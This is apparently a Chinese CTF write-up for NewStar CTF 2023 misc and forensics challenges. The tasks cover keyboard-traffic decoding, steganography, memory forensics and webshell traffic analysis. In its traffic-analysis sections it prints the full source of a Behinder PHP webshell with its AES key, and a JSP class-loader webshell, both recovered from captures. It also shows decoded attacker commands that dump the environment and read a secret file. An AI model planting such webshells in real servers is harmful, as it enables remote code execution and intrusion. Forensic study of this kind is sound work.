output :nw3lc0m3<SPACE>to<SPACE>newstar<SPACE>ctf<SPACE>2023<SPACE>flag<SPACE>is<SPACE>here<SPACE>vvvvbaaaasffjjwwwwrrissgggjjaaasdddduuwwwwwwwwiiihhddddddgggjjjjjaa1112333888888<ESC><ESC>2hhxgbffffbbbnnat<CAP><CAP>ff<DEL>lll<DEL><DEL>aaa<DEL><DEL>gggg<DEL><DEL><DEL>{999<DEL><DEL>999<DEL><DEL>11<DEL>9aaa<DEL><DEL><SPACE><SPACE><DEL><DEL>eb2---<DEL><DEL>a450---<DEL><DEL>2f5f<SPACE><SPACE><SPACE><DEL><DEL><DEL>--<DEL>7bfc[unknown][unknown][unknown]-8989<DEL><DEL>dfdf<DEL><DEL>4bfa4bfa<DEL><DEL><DEL><DEL>85848584}}}<DEL><DEL><DEL><DEL><DEL><DEL><DEL>}]<SPACE><SPACE><SPACE><SPACE>nice<SPACE>work!1yyoou<SPACE>ggot<SPACE>tthhis<SPACE>fllag

<DEL>表示删除,<SPACE>表示空格,根据这个按键顺序对数据进行处理后得到flag:flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}

https://rickliu.com/posts/04d1547e2896/index.html#键盘侠
这里,摘一个数据带冒号的脚本

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('newusbdata.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :' + "".join(output))

滴滴滴

DTMF拨号音,工具http://aluigi.altervista.org/mytoolz/dtmf2num.zip
把音频放在同一个文件夹下,这里打开终端,dtmf2num.exe 奇怪的音频.wav,可能执行不了(我的就是),可以把它们两个都拖进来
在线识别,https://dtmf.netlify.app/
还有Python脚本的,https://www.cnblogs.com/M0x1n/p/DTMF2num.html
得到,52563319066,还有张图片没用,大胆猜测steghide
steghide extract -sf 'secret.jpg' -p 52563319066

week4

R通大残

拿到图片,感觉可能宽高不对,根据crc32爆一下宽高(拖入虚拟机也行)

import struct
import zlib


def hexStr2bytes(s):
    b = b""
    for i in range(0, len(s), 2):
        temp = s[i:i+2]
        b += struct.pack("B", int(temp, 16))
    return b


str1 = "49484452"  # IHDR
width = "0x2A"
height = "0x00C8"
str2 = "0802000000"  # 宽高后五个字节
crc32 = "0x112DE485"  # 再后四个字节
add_num = 2000  # 最大宽高,合理修改快速出flag
bytes1 = hexStr2bytes(str1)
bytes2 = hexStr2bytes(str2)
wid = int(width, 16)
hei = int(height, 16)

for w in range(wid, wid+add_num):
    for h in range(hei, hei+add_num):
        width = hex(w)[2:].rjust(8, '0')
        height = hex(h)[2:].rjust(8, '0')
        bytes_temp = hexStr2bytes(width+height)
        if eval(hex(zlib.crc32(bytes1+bytes_temp+bytes2))) == eval(crc32):
            print(hex(w), hex(h))
            break
    if eval(hex(zlib.crc32(bytes1+bytes_temp+bytes2))) == eval(crc32):
        # print(hex(w),hex(h))
        break

发现是没问题的,但注意看图片的最上面有东西,一行色块
lsb隐写,zsteg -a secret.png立马出(感觉比stegsolve方便啊)
stegsolve的话R通道全部勾上,关闭R通道,不显示红色,R大残

或者参考一下官方
提取出第一行像素色块的RGB值,发现R值是变化的,很明显是flag

from PIL import Image
image = Image.open("secret.png")
pixels = image.load()
width, height = image.size
flag = ''
for x in range(width):
    r, g, b = pixels[x, 0]
    flag += chr(r)
    print(f"R={r}, G={g}, B={b}")
print(flag)

Nmap

学一下Nmap的端口扫描技术
https://blog.csdn.net/weixin_41905135/article/details/124541161
过滤出TCP SYN和ACK标志位为1的所有流量包,tcp.flags.syn ==1 && tcp.flags.ack ==1

所以,开放的端口是80,3306,5000,7000,8021,9000

依旧是空白

这图片一眼宽高不对,爆破一下得到高为04 14
得到password: s00_b4by_f0r_y0u
Snow隐写,之前好像polar有道张万森下雪了

snow 是一款在html嵌入隐写信息的软件,原理是通过在文本文件的末尾嵌入空格和制表位的方式嵌入隐藏信息,不同空格与制表位的组合代表不同的嵌入信息。

snow在ascii文本末尾隐藏数据,可以通过插入制表符和空格是数据在浏览器不可见
snow最多添加7个空格,使每八列插入三位,文件中有许多制表符和空格
在线解析网页的SNOW隐写:http://fog.misty.com/perry/ccs/snow/snow/snow.html
SNOW官网:The SNOW Home Page (darkside.com.au)
SNOW.exe 下载:http://darkside.com.au/snow/snwdos32.zip

https://hasegawaazusa.github.io/snow-note.html
拖入本地文件夹
snow.exe -p "s00_b4by_f0r_y0u" -C White.txt
我的又执行不了,把这两个文件拖进来才行

3-溯源

需要找到,攻击者获取到的服务器用户名,服务器内网IP地址,同时题目还告诉我们是冰蝎shell

顺着上一次的跟踪,搜索上次的webshell文件wh1t3g0d.php
或者,http.request.uri.path contains "wh1t3g0d.php",也可以找一下post的请求http.request.method == POST
发现又写入了shell.php,再搜索一次
通过不断地追踪http流,发现了

调用file_put_contents写入了一个1.php文件,同时base64解码得到

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?

秘钥e45e329feb5d925b,流量采用AES128加密
后续的交互需要通过1.php实现,把所有1.php的响应流量过滤出来
http.response_for.uri contains "/1.php",导出特定分组保存

通过追踪流,来解AES的加密密文,http://tools.bugscaner.com/cryptoaes/

解出的都是json格式,状态一般都是success,重点是msg
得到

OLDPWD=/var/www/html
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html

所以,用户是www-data

得到服务器内网IP,172.17.0.2
不止是这两个包,其他的也有

总的来说,后面的操作就是不断追踪http流,解AES密文,再base64找信息
总共19组吧,追踪http流之前,点击它,你可以发现同一组的流量左侧会有一个很明显的跨度

第一次取证

先下载volatility,需要Python2的环境
https://blog.csdn.net/qq_38603541/article/details/129244112
https://blog.csdn.net/qq_42880719/article/details/117304586
https://blog.csdn.net/qq_22406677/article/details/134596477
emmmm,我的有一点小问题,volatility指令用不了,得换个方法
dycqz.raw拖入volatility文件夹,在此打开终端

imageinfo:分析获取内存镜像的基本信息
vol.py -f dycqz.raw imageinfo

pslist:查看镜像中正在运行的进程
vol.py -f dycqz.raw --profile=Win7SP1x64 pslist

查看notepad进程
vol.py -f dycqz.raw --profile=Win7SP1x64 editbox
得到字符串

@iH<,{BTrI;(N`j&z+xcj9XE2!u/YbR:4gb2+ceDJs@u6P

随波逐流得到,base91

week5

隐秘的图片

两张二维码,有一张还是损坏的,但完整那张是有用的,想到异或

File Format:文件格式
Data Extract:数据提取
Steregram Solve:立体试图 可以左右控制偏移
Frame Browser:帧浏览器
Image Combiner:拼图,图片拼接

emmm,终于解锁stegsolve的最后一个用法了

ezhard

磁盘取证,可以用7z逃课,hint.png就是flag

官方做法是,使用到Linux
file ezhard,发现是硬盘格式文件

新建目录挂载,root权限下
mkdir newstarctf
mount ezhard newstarctf/

我试过这样做,得到的hint.png是损坏的,emmmm

新建Python文件

pyc反编译https://tool.lu/pyc/
反编译出来的py文件没什么用
试一下,pyc文件隐写
https://github.com/AngelKitty/stegosaurus
我的评价是,下一个Python3.6的版本,我就下了3.66
https://link.zhihu.com/?target=https%3A//www.python.org/ftp/python/3.6.6/python-3.6.6-embed-amd64.zip
然后修改环境路径就可以了,把flag.pyc拖入文件夹
python stegosaurus.py -x flag.pyc

各版本下载https://zhuanlan.zhihu.com/p/601465835

BabyAntSword

又是流量分析,不过是蚁剑流量
导出http对象,发现文件上传,也可以过滤出post请求(本题涉及到文件上传,后面肯定还要用到,http.request.method == POST)
发现

查看

导出压缩包

我用的winhex
打开jsp

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("n3wst4r");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

得到webshell密码,n3wst4r,好吧虽然我也不懂,是就是吧
过滤post请求,继续追踪,根据蚁剑的特性,传参的第三位开始才是真正的参数,将其复制base64解码

找到tcp.stream eq 39
请求报文
Y2QgIi91c3IvbG9jYWwvdG9tY2F0IjtlbnY7ZWNobyBmNWNkOTtwd2Q7ZWNobyAwYTI1ZmJjMWM1,得到,cd "/usr/local/tomcat";env;echo f5cd9;pwd;echo 0a25fbc1c5,找到了env,这里执行了env指令
响应报文
剔除了第一行的不等长

得到Java版本7u121

tcp.stream eq 43
找到
Y2QgIi91c3IvbG9jYWwvdG9tY2F0IjtjYXQgLy5zZWNyZXQ7ZWNobyBmNWNkOTtwd2Q7ZWNobyAwYTI1ZmJjMWM1

cd "/usr/local/tomcat";cat /.secret;echo f5cd9;pwd;echo 0a25fbc1c5
查看响应的/.secret

7c5e498eYzU4NTBhMGMtZGMwMy0xZGIyLTQzMDMtNDNkNmZkZjI3OTg1DQpmNWNkOQ0KL3Vzci9sb2NhbC90
b21jYXQNCjBhMjVmYmMxYzUNCg==bdf33c892c47

得到我们想要的,c5850a0c-dc03-1db2-4303-43d6fdf27985
flag第三段是攻击者删除的文件内容?没看出怎么删除的,emmm

Easymem

又是内存取证
emmmm,我volatility插件配不好,放弃了
https://www.cnblogs.com/Mar10/p/17813974.html

Enigma

恩尼格码机
https://www.zhihu.com/question/28397034/answer/41739506
晕,逃了
贴个官方脚本,EnigmaMachine爆破

from enigma.machine import EnigmaMachine
reflectors = ['B-Thin', 'C-Thin']
rotors = ['I', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII']
for r1, r2, r3 in [(r1, r2, r3) for r1 in rotors for r2 in rotors for r3 in rotors]:
    for r in reflectors:
        for a, b in [(a, b) for a in range(1, 26) for b in range(1, 26)]:
            machine = EnigmaMachine.from_key_sheet(
                rotors=' '.join([r1, r2, r3]),
                reflector=r,
                ring_settings=[a, 15, b],
                plugboard_settings='')
            temp = machine.process_text(
                'uwdhwalkbuzwewhcaaepxnqsvfvkohskkspolrnswdfcbnn')
            if temp.startswith("FLAG"):
                print(temp, r1, r2, r3, r)
                break

好家伙,这库貌似没有?反正我没下到

总结

还没开始写,Web题好多啊,没补完QWQ